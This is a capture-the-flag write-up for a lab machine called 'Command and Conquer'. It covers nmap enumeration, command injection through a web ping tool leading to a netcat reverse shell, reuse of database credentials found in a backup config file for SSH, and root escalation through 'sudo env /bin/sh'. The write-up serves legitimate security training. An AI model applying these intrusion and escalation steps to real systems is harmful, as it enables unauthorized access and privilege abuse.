Command and Conquer
This is my writeup for the Command and Conquer that was created by my friend, CrimsonFlea.
As always (and as instructed), we need to start by enumerating. Running a very simple Nmap script such as
nmap -sC -sV -T4 10.10.x.x Starting Nmap 7.60 ( https://nmap.org ) at 2023-09-11 19:30 BST
Nmap scan report for ip-10-10-170-230.eu-west-1.compute.internal (10.10.170.230)
Host is up (0.0010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Command and Crush
MAC Address: 02:E1:DB:A5:D4:0F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.55 seconds
We can see that with our results we got back two open ports. For the sake of trying to compromise the host as fast as possible, we should start with port 80, as we do not have an credentials to try to authenticate to port 22 with.
Heading to the application by using the IP of the machine, we can see its an application for a blog for chess. Saving you the time, I have crawled all of the links related to the application, and they are all dead links.
So now we have to enumerate on our own, and see if we can find some subdomains or subdirectories that are available to us. We dont really have a good idea what the domain name is so its probably better to try sub directories first.
I personally use GoBuster but use whatever you'd like for achieving this. Running a common wordlist of sub directories with GoBuster, we get the following.
Now navigating to the sub directory we can see that we got access to the backend of the application, and now have access to things such as the server information, and even the ability to ping other machines, and we can see this if we run a ping against the local host 127.0.0.1.
Naturally, I would try to break out of this and see if we can get some Remote Code Execution to the backend, so that we can harvest that into a reverse shell for easier enumeration. (You can enumerate via the ping box too but it is a lot harder).
Cool! It looks like we might be able to breakout of this. Lets start our netcat listener on port 4444 and see if we can upload a shell.
We have a shell!! Now that we have our shell we can start enumerating at a much faster rate. Running an ls we don't see much so lets move up a folder.
In this folder we can see that we have a bunch of files, what specifically stuck out to me was the config.php.bak file. As the application user, we have access to this, and even we open it up we can see that we have database credentials.
Now if we try those credentials against SSH, we can see they are valid. From here we can grab our user flag from the users folder /home/gkasparov/user.txt
Now the next objective is the root.txt file. Just trying to concatenate the file we can see we get a permission denied error. So now its a matter of escalating our privleges to a user who has the ability to read this file.
We can enumerate our privileges by running commands like whoami to check our current user, id to see our current permissions as the user, sudo -l lists out our sudo privileges.
Running sudo -l we see that the user gkasparov has access to the env command.
Running this command we get back some environment settings. Okay but how do we abuse this?
Running env /bin/sh does not allow us to do anything but we can use sudo for the env command, which means that this can be run as root based on how it was configured.
Linking this with sudo to get sudo env /bin/sh we can see we have spawned a new kind of shell. Running the whoami command will return root ! So now lets see if we can open up that folder and get the root flag.
https://gtfobins.github.io/gtfobins/env/
Boom! We have rooted the machine :)
Last updated